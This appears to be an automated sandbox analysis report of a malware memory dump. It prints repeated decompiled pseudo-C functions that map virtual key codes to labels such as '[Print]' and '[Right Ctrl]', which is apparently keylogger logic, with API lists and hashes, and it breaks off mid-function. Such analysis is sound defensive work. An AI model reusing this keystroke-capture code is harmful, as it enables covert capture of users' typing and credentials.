0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Pause], xrefs: 10007631

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Pause]
API String ID: 783433895-3639855092
Opcode ID: 3ddccb20161475669b32e0ed3f5f6986b7ff8bc474ac456663870ed987cadc77
Instruction ID: f377d357f69d7f331ddfabdbfb855c93a3b8fb647f7e8fffab3015d3f91a404c
Opcode Fuzzy Hash: 3ddccb20161475669b32e0ed3f5f6986b7ff8bc474ac456663870ed987cadc77
Instruction Fuzzy Hash: 6231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007640, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007640(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Print]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007640
0x10007640
0x10007647
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[Print], xrefs: 10007642
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Print]
API String ID: 783433895-2723926450
Opcode ID: 71e1bbc33dcade09357cc993f120fda1afbf8fb62500d9a110b3f8fbfb4a5a8d
Instruction ID: 24b1e428621fc0ddc22d7c61b343553baf738b43ed31914f1cc8e82f23897795
Opcode Fuzzy Hash: 71e1bbc33dcade09357cc993f120fda1afbf8fb62500d9a110b3f8fbfb4a5a8d
Instruction Fuzzy Hash: 8731C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007651, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007651(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Page Up]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007651
0x10007651
0x10007658
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Page Up], xrefs: 10007653
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Page Up]
API String ID: 783433895-227267868
Opcode ID: ed868094e9fb9788b0736906f1eab0e99cfbf2a70a189b7d5b275534b12506be
Instruction ID: d1f179d62c1294aab4835214f7be03122cb2be3f790280f2a5ffd5127ba462cb
Opcode Fuzzy Hash: ed868094e9fb9788b0736906f1eab0e99cfbf2a70a189b7d5b275534b12506be
Instruction Fuzzy Hash: 0331C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007662, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007662(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Right Ctrl]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007662
0x10007662
0x10007669
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Right Ctrl], xrefs: 10007664

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Right Ctrl]
API String ID: 783433895-2161099509
Opcode ID: 37b88f1e4698b1e3016850942fdcabb82c0df24804045081dcb261375e4b9424
Instruction ID: 8e6155c5c846e0b52aba043055f7dd5c5d9cb4f960ca40d31a8d32a727805560
Opcode Fuzzy Hash: 37b88f1e4698b1e3016850942fdcabb82c0df24804045081dcb261375e4b9424
Instruction Fuzzy Hash: A631C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007670, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007670(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Arrow Right]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007670
0x10007670
0x10007677
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Arrow Right], xrefs: 10007672

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Arrow Right]
API String ID: 783433895-2747614471
Opcode ID: aca24b8e51f7e3e1dab343980e379713395e851feaea9de910577454060b53af
Instruction ID: d55769cdf0c3d80231fc2ac86e76adf7b4e32c99f9af14db686804d95fffef21
Opcode Fuzzy Hash: aca24b8e51f7e3e1dab343980e379713395e851feaea9de910577454060b53af
Instruction Fuzzy Hash: 3931C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489B24ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000767E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000767E(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Right Alt]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000767e
0x1000767e
0x10007685
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Right Alt], xrefs: 10007680

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Right Alt]
API String ID: 783433895-444060433
Opcode ID: d9417e567954be7a013c4a1f352142b679dc3c107156d497e706b0c1705b6daf
Instruction ID: afd7f63f49bfae50f92b7a44b0612bc8afbb30cc7fb8ea37a6cc1a6026fb1e9c
Opcode Fuzzy Hash: d9417e567954be7a013c4a1f352142b679dc3c107156d497e706b0c1705b6daf
Instruction Fuzzy Hash: 4231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000768C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000768C(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Scrol Lock]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
